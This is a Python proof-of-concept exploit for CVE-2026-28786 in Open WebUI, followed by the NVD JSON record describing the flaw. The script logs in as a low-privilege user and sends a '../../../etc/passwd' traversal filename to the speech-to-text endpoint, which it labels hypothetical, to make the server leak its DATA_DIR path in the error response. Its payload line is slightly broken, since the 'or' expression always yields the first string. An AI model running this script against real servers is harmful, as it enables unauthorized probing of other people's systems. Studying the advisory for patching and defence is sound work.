CVE-2026-28786

import requests # Target configuration target_host = "http://target-open-webui-instance.com" login_url = f"{target_host}/api/login" transcribe_url = f"{target_host}/api/v1/transcribe" # Hypothetical endpoint # Attacker credentials (Low-privilege user) creds = { "username": "attacker", "password": "password123" } def exploit(): session = requests.Session() # Step 1: Authenticate print("[*] Attempting to login...") login_resp = session.post(login_url, json=creds) if login_resp.status_code != 200: print("[-] Login failed") return print("[+] Login successful") # Step 2: Trigger the vulnerability # Sending a malformed filename to trigger the FileNotFoundError payload = { "filename": "../../../etc/passwd" or "non_existent_file_12345.txt" } print("[*] Sending malicious payload to transcription endpoint...") vuln_resp = session.post(transcribe_url, data=payload) # Step 3: Check for information disclosure if vuln_resp.status_code == 400: print("[+] Received HTTP 400 response. Checking body...") response_text = vuln_resp.text if "DATA_DIR" in response_text or "/" in response_text: print("[!] Vulnerability Confirmed! Sensitive path found in response:") print(response_text) else: print("[-] Path not found in response.") else: print(f"[-] Unexpected status code: {vuln_resp.status_code}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-28786", "sourceIdentifier": "[email protected]", "published": "2026-03-27T00:16:22.503", "lastModified": "2026-03-30T17:25:24.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue."}, {"lang": "es", "value": "Open WebUI es una plataforma de inteligencia artificial autoalojada diseñada para operar totalmente fuera de línea. Antes de la versión 0.8.6, un campo de nombre de archivo no saneado en el endpoint de transcripción de voz a texto permite a cualquier usuario autenticado no administrador activar un 'FileNotFoundError' cuyo mensaje — incluyendo la ruta absoluta 'DATA_DIR' del servidor — se devuelve textualmente en el cuerpo de la respuesta HTTP 400, confirmando la revelación de información en todas las implementaciones predeterminadas. La versión 0.8.6 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.6", "matchCriteriaId": "98042D01-E16B-45CE-9BBC-E5A6E2AA2370"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}